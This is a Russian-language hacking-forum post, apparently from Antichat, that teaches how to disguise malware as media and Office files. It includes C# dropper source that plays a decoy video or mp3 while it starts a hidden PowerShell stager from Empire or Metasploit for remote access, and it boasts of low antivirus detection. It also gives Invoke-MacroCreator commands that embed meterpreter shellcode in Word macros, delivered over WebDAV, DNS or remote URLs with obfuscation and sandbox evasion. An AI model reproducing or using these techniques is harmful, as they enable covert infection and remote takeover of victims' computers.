ANTICHAT - [В паблик из RED TEAM] Заражаем [ video,mp3,gif,doc ] detect 5-10%

Всем привет, решил здесь оставить свой след в ветке, касаемо нашей любимой темы, пусть останется в веках!))
Заражать мы будем самые распространенные файлы которыми пользуется каждый, так же решил, я еще и доказать Вам свою проф пригодность)
да и думаю не хер в себе все держать! Нужно делится своими находками и наработками! Чего и Вам желаю..

одно подозрительное слово "находками" Да признаюсь сразу эту технику я честно.... спиздил, но при минимальном знании программирования и работай с visual-studio
ее можно настроить под себя)

Итак начнем, с заражения видео файла. Нам по требуется visual-studio 2017 с языком С#, Empire or Metasploit. Я лично буду юзать империю.

Генерим в империи батник, предварительно настроив listener : usestager | windows/launcher_bat убираем лишнее, берем нужное как показано ниже!

https://forum.antichat.xyz/attachmen...d4dd4bfed5.png

Скачиваем эту сборочку открываем в студии и ..

https://forum.antichat.xyz/attachmen...21b2f4f064.png

как видите редачим, файл Program.cs и вставляем в 21(очко)) строчку свою строчку сгенеренную в империи)

Детект только один из 40 палит только касперыч(

все просто до "не могу" И не дай мне Бог увидеть эти методики на каких нить РУ-бордах так как я знаю что в РУ-зоне впервые они описываются!) и как этот видео проект создавался Вы поймете ниже на примере создания mp3-virus

Заражаем mp3

https://forum.antichat.xyz/attachmen...4397e2daaa.png

Создаем проект как показано выше. Удаляем стандартное заполнение и вставляем свое:

Код:

Код:

using System;

using System.IO;

using System.Diagnostics;



namespace Namespace

{

    class Program

    {

        static void Main()

        {

            // Copiar el vídeo a un archivo temporal y abrirlo

            byte[] archivo = Properties.Resources.NombreArchivo;

            string destino = Environment.ExpandEnvironmentVariables(@"%tmp%\nombre_archivo.extension");

            File.WriteAllBytes(destino, archivo);

            Process procesoArchivo = Process.Start(destino);



            // Ejecutar launcher

            ProcessStartInfo launcherProcess = new ProcessStartInfo();

            // C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            launcherProcess.FileName =  Environment.ExpandEnvironmentVariables(@"%windir%\System32\WindowsPowerShell\v1.0\powershell.exe");

            launcherProcess.Arguments = "-Command Add-Type -AssemblyName 'System.Windows.Forms'; [Windows.Forms.Messagebox]::Show('Hacked')";

            launcherProcess.WindowStyle = ProcessWindowStyle.Hidden;

            Process.Start(launcherProcess);



            // Esperar a que cierren el vídeo/imagen/pdf, lo que sea

            procesoArchivo.WaitForExit();

            // Eliminar nuestro vídeo

            while (File.Exists(destino))

            {

                try

                {

                    File.Delete(destino);

                }

                catch {}

            }

        }

    }

}

[обратите внимание на 25 строку в коде] Уже уловили суть? хех..

Самое главное видео показывает и музыка играет, а к Вам прилетает заветная сессия!)

переименовываем 5 строчку

https://forum.antichat.xyz/attachmen...ebb316dc75.png

в свойствах ConsoleApp1 добавляем mp3 ресурс

https://forum.antichat.xyz/attachmen...ee2302733d.png

назовем его античат .mp3

далее изменяем эти строки:

https://forum.antichat.xyz/attachmen...f3b48aed4c.png

ну и "грузим" своей нагрузкой в нашу 21 строку

coздаем иконку зайдя на этот онлайн ресурс эту .ico грузим к себе в ресурсы нашей злой эмпэтри - прожки ))

https://forum.antichat.xyz/attachmen...df795e8716.png

и собираем наше творение...

с GIF-ками и PDF-ками я думаю справитесь....

теперь макрос-ы "Эх! Говорит и показывает Рассея" Шариков П.П

слышали про Invoke лютого криптовщика PowerShell так вот создали продукт на основе его трудов.

PowerShellScripts

https://forum.antichat.xyz/attachmen...3e3e26aef6.png

Свежачок, для красной братвы!)

Шеллкод, встроенный в тело документа MS-Word, без обфускации, без уклонения от песочницы:

Код:

Код:

C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d body

Шеллкод передается по скрытому каналу WebDAV с обфускацией, без уклонения от песочницы:

Код:

Код:

C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -url webdavserver.com -d webdav -o

Сценарий доставлен по библиографическому источнику скрытого канала, с обфускацией, с уклонением песочницы:

Код:

Код:

C:\PS> Invoke-MacroCreator -i regsvr32.sct -t file -url 'http://my.server.com/sources.xml' -d biblio -c 'regsvr32 /u /n /s /i:regsvr32.sct scrobj.dll' -o -e

Исполняемый файл передается через скрытый канал WebDAV, используя UNC, без обфускации, с уклонением от песочницы, используя метод выполнения 3:

Код:

Код:

C:\PS> Invoke-MacroCreator -i badass.exe -p file -t webdav -c 'badass.exe' -e -m 3

Командная строка, встроенная в тело документа MS-Word, с обфускацией, без уклонения от песочницы, с использованием метода выполнения 1:

Код:

Код:

C:\PS> Invoke-MacroCreator -i my_cmd.bat -p cmd -t body -o -m 1

Шеллкод, встроенный в комментарий документа MS-Word, не обфускация, отсутствие уклонения от песочницы, добавление функций автоматического открытия:

Код:

Код:

C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d comment -a

Шеллкод, поставляемый по скрытому каналу доставки DNS с использованием домена «mydomain.com», с обфускацией, без уклонения от песочницы:

Код:

Код:

C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d dns -dn mydomain.com -o

Функционал как видите впечатляет, но я пока не тестил и пожалуйста как будете собирать макросы по делитесь здесь буду благодарен очень, честно... Да и другим тоже будет полезно это увидеть)

Спасибо за внимание, с вами был на веки Ваш Ondrik8)